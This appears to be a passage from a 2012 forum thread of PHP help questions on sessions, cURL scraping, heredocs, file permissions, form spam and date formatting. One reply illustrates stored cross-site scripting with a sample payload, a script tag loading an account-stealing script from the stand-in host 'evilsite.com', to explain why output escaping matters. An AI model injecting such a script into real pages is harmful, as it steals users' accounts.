|
Hammerite posted:But unless I misunderstand, they won't log in, will they? They'll just join in on a session that's already logged in. The way I understand it, that doesn't happen because they don't have the cookie, just the ID. So unless your website just throws out cookies when people go to it, they would have to log in first, then receive the cookie which has the session ID that they gave it. Or something.
|
# ? Apr 10, 2012 16:33 |
|
|
# ? Jun 4, 2024 04:59 |
|
Sab669 posted:Could you elaborate on this? Basically what the page was doing was auto-populating a form with that user's information from the database when they click to view their own profile for editing it. Also, as far as sanitizing input, everything is done through prepared statements. I think musclecoder assumed you were printing out something submitted via a post or get request. You should be fine if you can verify your data's been sanitized.
|
# ? Apr 10, 2012 21:48 |
|
Sab669 posted:Could you elaborate on this? Basically what the page was doing was auto-populating a form with that user's information from the database when they click to view their own profile for editing it. Also, as far as sanitizing input, everything is done through prepared statements. What if I tell the system that my first name is <script src='http://evilsite.com/steal-your-account.js'>, and someone else views my profile page? Or if the viewing-your-profile page is already done and is different to this, why not just look at how it's done there?
|
# ? Apr 10, 2012 22:31 |
|
Sab669 posted:Also, as far as sanitizing input, everything is done through prepared statements. Didn't see this yesterday, but... You appear not to have a good understanding of what it means to "sanitise" data. Prepared statements are a way to make sure communication with the database is safe from certain kinds of exploits. This is a completely different concern from that. The point being made is that if you accept arbitrary input from a user and echo it back out onto an HTML page then it could contain exploits that target users' browsers, rather than databases. There is no such thing as "just sanitising" data. Talking about sanitising data is meaningless unless you specify with respect to what set of concerns the data has been sanitised. Has it been sanitised for a database connection, for an HTML page, for a filesystem...?
|
# ? Apr 11, 2012 11:14 |
|
Hammerite posted:Didn't see this yesterday, but... You appear not to have a good understanding of what it means to "sanitise" data. Prepared statements are a way to make sure communication with the database is safe from certain kinds of exploits. This is a completely different concern from that. The point being made is that if you accept arbitrary input from a user and echo it back out onto an HTML page then it could contain exploits that target users' browsers, rather than databases. Yea, after seeing Jabor's post I see what you guys mean. I've just always only heard the term used in reference to SQL injection, really.
|
# ? Apr 11, 2012 17:36 |
|
I'm using a bunch of classes in a certain namespace Foo which sometimes dump out some debug info to stdout, which I'd prefer to not dump to the website. So I'd like to start output buffering before those methods are called, and then flush the OB after the method returns. Now, I could just wrap all of the method calls myself: php:<? ob_start(); $widget = \Foo\Widget->doSomething(); ob_end_clean(); ?> Deus Rex fucked around with this message at 03:55 on Apr 15, 2012 |
# ? Apr 15, 2012 03:42 |
|
I'm tracking items on Newegg by using cURL to pull the source of the page and then going through that to pull details for each item. The problem I'm having is that the price doesn't actually seem to show up in the source of the page. I can't really tell what's going on, but I'm guessing it's displayed using javascript or iframes or something. Can anyone shine some light on what's going on here or if there's a way to grab the page after all the javascript runs? hayden. fucked around with this message at 22:54 on Apr 15, 2012 |
# ? Apr 15, 2012 22:49 |
|
If it is populated by javascript, then the javascript has to get it from somewhere. I find that firebug helps me find this kind of stuff every so often. I don't have any recent orders from newegg, so I can't track it down. But looking at their page, I see some JSON script, which I suspect may just be where it's getting the data. Probably not all that helpful, but I tried to give my two cents.
|
# ? Apr 15, 2012 23:04 |
|
They have RSS feeds, could you grab the price data from it? http://www.newegg.com/Product/RSS.aspx?Submit=RSSCategorydeals&Depa=0&Category=228&NAME=Desktop-PCs for example.
|
# ? Apr 16, 2012 00:32 |
|
Thanks for the feedback, guys. Turns out the search pages have the price right there in the source so I'll get it from that.
|
# ? Apr 16, 2012 04:09 |
|
hayden. posted:I'm tracking items on Newegg by using cURL to pull the source of the page and then going through that to pull details for each item. http://content.newegg.com/LandingPage/ItemInfo4ProductDetail.aspx?Item=N82E16826106455
|
# ? Apr 16, 2012 04:58 |
|
Awesome, thanks.
|
# ? Apr 16, 2012 12:06 |
|
Is it possible to set the value of a PHP variable in a .htaccess file? For example, can I create a .htaccess file such that when visited, this script outputs '3' to the browser? code:
Note 2: It is also acceptable for the prepopulated entity to be a PHP constant, rather than a PHP variable (so the above line of PHP would instead be something like echo MY_VARIABLE;).
|
# ? Apr 16, 2012 21:22 |
|
You can set an environment variable in your .htaccess file that you can access in php .htaccess code:
code:
http://www.php.net/manual/en/function.getenv.php
|
# ? Apr 16, 2012 21:34 |
|
ecsyle posted:You can set an environment variable in your .htaccess file that you can access in php Thanks, this does what I wanted. I didn't know about environment variables.
|
# ? Apr 17, 2012 13:31 |
|
I decided it was a good idea to separate out things that I wrote to ease the pain of writing PHP, so that they are in discrete libraries, rather than just copy-and-pasting versions of them into things I work on and making ad-hoc changes. The first thing I did it with was this. It is intended to allow creation of HTML pages as PHP objects. Yes I know there are a plethora of things like that already. You are welcome to look at it and tell me it sucks (as long as you tell me why it sucks). The version there is hardly tested at all by the way.
|
# ? Apr 18, 2012 16:23 |
|
I am looking at example code for jqGrid and they have a section where you assign some jqQuery code to a variable. The problem that I have is Dreamweaver doesn't seem to recognize <<<CUSTOM ... CUSTOM; and if I try to run it on our PHP server anyway, then I'll get the following error:quote:Parse error: syntax error, unexpected T_SL in /*filepath*/getRowGrid.php on line 30 code:
Aniki fucked around with this message at 22:20 on Apr 18, 2012 |
# ? Apr 18, 2012 22:13 |
|
code:
You have stuff after <<<CUSTOM. even "<<<CUSTOM " (with a space) won't work, because "CUSTOM;" -> "CUSTOM" doesn't match "CUSTOM " I guess?
|
# ? Apr 18, 2012 22:26 |
|
Aniki posted:I know that I've encountered the <<<CUSTOM ... CUSTOM; block before, but I can't remember how I handled it and I haven't had any luck searching on Google for it either. Is there a different way that I need to format it or is this something that is only supported in certain versions of PHP? I attempted to answer your question and then saw that Biowarfare had answered it. Just to say, a string written that way is called a heredoc, in case you need to search for details of it in future.
|
# ? Apr 18, 2012 22:36 |
|
Hammerite posted:I attempted to answer your question and then saw that Biowarfare had answered it. Just to say, a string written that way is called a heredoc, in case you need to search for details of it in future. I was a little confused by Biowarfare's answer, but it's starting to make sense now and I did see that after I removed the space after <<<CUSTOM that DreamWeaver no longer alterted me for an error for that line. Thank you for providing the heredoc term, that should make it a lot easier for me to search for info on this. Edit: I got it working now, thank you to Hammerite and Biowarefare for your help. Aniki fucked around with this message at 22:52 on Apr 18, 2012 |
# ? Apr 18, 2012 22:46 |
|
code:
output posted:my guid (getmyguid): 502 I'm trying to understand why this path is not writable. Permission bits are 0750. When executing under CLI as the same user (xyz:x:502:xyz) it works fine. The user is being set via a setuid flag (u+s), and I'm beginning to suspect that even though it's running as that user, something else isn't being updated to the process. I'm not proficient enough with unix permissions to sort this out. Anyone have any ideas? (the code is just hacked together to make sure the plumbing was 'correct'). If it wasn't obvious by the array function result access, this is PHP 5.4, but nothing has changed in the related functions as far as I can tell.
|
# ? Apr 24, 2012 01:42 |
|
Oversaucy posted:
is_writable() doesn't check effective permissions, it checks to see if the owner of the file matches and the write permission bit is set. Given that you're using setuid, I suspect that's the problem.
|
# ? Apr 24, 2012 04:41 |
|
So I'm thinking that there must be a better way to approach a problem. I have a number of remote systems uploading (zipped) log files by ftp. I'm setting up a cron job on my server to check the log directory every minute to check every file in it, unzip and insert into the db. I'm doing sanitisation and discarding invalid zip files - since the files get uploaded over temperamental connections, incomplete uploads are not uncommon and not a big problem - but I would like to ensure that files are properly uploaded before trying to open or work with them so that my own script doesn't cause problems with the logging process. The way I see it, I can either have the script check the file timestamp and only work on the file after two or three minutes, I could use a separate table to monitor timestamps and file size and work from there, or I could only discard the zip as bad after two or three attempts, though I don't know how file locking may affect that. Ultimately, I feel like I'm missing some much simpler option. While I'd rather not open up php to exec() functions for security reasons, it's a virtual server so I can handle things at a shell level and move only known good files to the directory for php to check. Any ideas?
|
# ? Apr 29, 2012 16:04 |
|
Alright, I've been Googling on and off for a few days and I'm hoping there's a simple solution- Web form spam. I've got a form, and the action goes to send_email_form.php. I pull the info from $_POST, sanitize it and do some regex for sanity checks. I've received a couple hundred fake form submissions, so out of naivety I built a little javascript captcha for the form itself. I don't even think that made a dent- I suspect that there's a script that's just directly accessing send_email_form.php. Past basic sanity checks, I haven't really seen much when googling around for 'prevent web form spam' and other queries like that. Does anyone have some tips/resources? edit: Do you think it's as simple as hiding a form field with CSS, and if it's been filled out to toss the request?
|
# ? May 2, 2012 13:58 |
|
Yeah, a hidden field will work most of the time. Do it.
|
# ? May 2, 2012 14:31 |
|
I apologize in advance if this is a dumb question, I'm really a novice when it comes to php. I have a date field from a database that comes in like this "2012-04-08" I have some images that I have to tie in to those dates. (one to one) The images are labeled "img_120408.jpeg" How can I convert "2012-04-08" to display as "120408"?
|
# ? May 2, 2012 17:29 |
|
stoops posted:I apologize in advance if this is a dumb question, I'm really a novice when it comes to php. php:<? echo 'img_' . date('ymd', strtotime('2012-04-08')) . '.jpeg'; ?>
|
# ? May 2, 2012 17:36 |
|
stoops posted:I apologize in advance if this is a dumb question, I'm really a novice when it comes to php. code:
quote:img_120408.jpeg
|
# ? May 2, 2012 17:37 |
|
stoops posted:I apologize in advance if this is a dumb question, I'm really a novice when it comes to php. $newDate = date('ymd', strtotime('2012-04-08'));
|
# ? May 2, 2012 17:37 |
|
stoops posted:I apologize in advance if this is a dumb question, I'm really a novice when it comes to php. $date = "2012-04-08"; echo substr($date,2,2).substr($date,5,2).substr($date,8,2); or a regular expression echo preg_replace('/\d{2}(\d{2})-(\d{2})-(\d{2})/',"$1$2$3",$date); You could also use the DateTime class and let PHP figure it out for you. $datetime = new DateTime($date); echo $datetime->format('ymd'); e: or you could spend way too much time answering a simple question and get beaten horribly.
|
# ? May 2, 2012 17:45 |
|
IT Guy, Biowarfare, Null Set and Doctor rear end in a top hat: Thanks, I appreciate. (I ended up using Null Set's version)
|
# ? May 2, 2012 18:07 |
|
Pre-emptive security alert. The thing going around about being able to view the source of any random PHP script? It relies on using mod_cgid, something you are almost certainly not running. It's not mod_php, it's not mod_fastcgi, it's not mod_fcgid, and it's most certainly not mod_cgi.
|
# ? May 3, 2012 09:24 |
|
I've been progressively getting better at writing out PHP and want to tackle converting my current site into OOP. Is there a definitive resource for PHP's OOP construction, or is it all basically the same formatting?
|
# ? May 3, 2012 14:17 |
|
I need a Codeigniter-based CMS that's not EE. I'm probably going to use PyroCMS. Does anyone have anything bad to say about PyroCMS? Is there anything better?
|
# ? May 7, 2012 16:24 |
|
i have this code:code:
How can I put the $lines all in one variable called output?
|
# ? May 9, 2012 21:34 |
|
Can't you just do $output += $line; inside your while loop?
|
# ? May 9, 2012 21:39 |
|
excidium posted:Can't you just do $output += $line; inside your while loop? This being PHP and not Javascript, you'd want .= instead of +=.
|
# ? May 9, 2012 21:59 |
|
I wrote a .net web service for a guy who is using php and I believe it's the first web service he has ever worked with and he's having issues. The web service works no problem from .net. I added POST/GET methods per his request, however I think he switched to using SOAP. He's getting this error: "Value cannot be null. Parameter name: g". The result he should be getting (given the arguments passed in) is "Invalid VendorID". Here is his code:code:
Essential fucked around with this message at 03:38 on May 13, 2012 |
# ? May 10, 2012 20:00 |
|
So I gave up trying to start with node.js, and have turned to trying my hand at PHP since w3schools has a tutorial for it (which is easier for me to digest) Anyways, for some reason I've confused myself at how to setup my computer to do php. I tried some simple stuff like printing Hello World but nothing shows. It's a blank page. I ended up downloading a number of different php binaries (thread safe and non thread safe?) and I think an Apache server which I don't know how to work... and I'm not even sure what Netbeans might have added in addition. Basically somehow I've confused myself. Anyone have like a 1. 2. 3. step guide of what to do from a clean slate just to get me on my feet so I can start learning and practicing php? Sorry for sounding like an idiot.
|
# ? May 13, 2012 00:37 |
|
|
# ? Jun 4, 2024 04:59 |
|
I'm assuming Windows here; what I'd suggest is uninstalling all that stuff. I've had a dedicated server for quite a while, but if I recall WAMP wasn't that bad: http://www.wampserver.com/en/ (Windows Apache MySQL PHP) You can choose to add/remove things like MySQL if you feel you don't need that yet.
|
# ? May 13, 2012 00:48 |